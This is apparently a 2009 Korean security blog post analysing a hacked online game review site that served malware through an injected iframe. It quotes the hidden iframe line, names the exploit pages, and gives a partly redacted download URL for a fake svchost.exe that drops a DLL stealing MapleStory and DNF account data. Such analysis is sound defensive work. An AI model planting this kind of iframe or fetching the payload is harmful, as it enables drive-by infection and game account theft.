태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'계정탈취'에 해당되는 글 1건

  1. 2009.05.23 [Hacked] 온라인 게임 리뷰 사이트 악성코드 유포
신종악성코드정보2009.05.23 14:51


메인 페이지에 악의적인 아이프레임이 삽입되어 있다.

<iframe src=http://203.(생략).117/index.htm width=100 height=0></iframe></a>
   

index.htm 파일에는 Multiple Exploit Code 가 포함되어 있다.


일부 PC에서는 다음과 같은 오류창이 나타날 수 있다.


- old.js
- flash.htm
- IE7.htm
- 06014.htm
- real.htm
- new1.htm
- ac.htm

Exploit Code 들에 의해서 중국사이트에 숨겨져 있는 svchost.exe 파일이 설치시도 된다.

http://down.(생략).org/svchost.exe

svchost.exe 파일이 실행되면 다음과 같은 파일이 생성된다.

C:\Windows\System32\korean.dll
C:\Windows\System32\msdconf.exe

korean.dll 파일은 다음과 같은 온라인 게임의 주요 모듈 사용자의 정보 탈취를 시도한다.

MAPLESTORY.EXE
DNF.EXE
GAMELAUNCHER.EXE



Posted by viruslab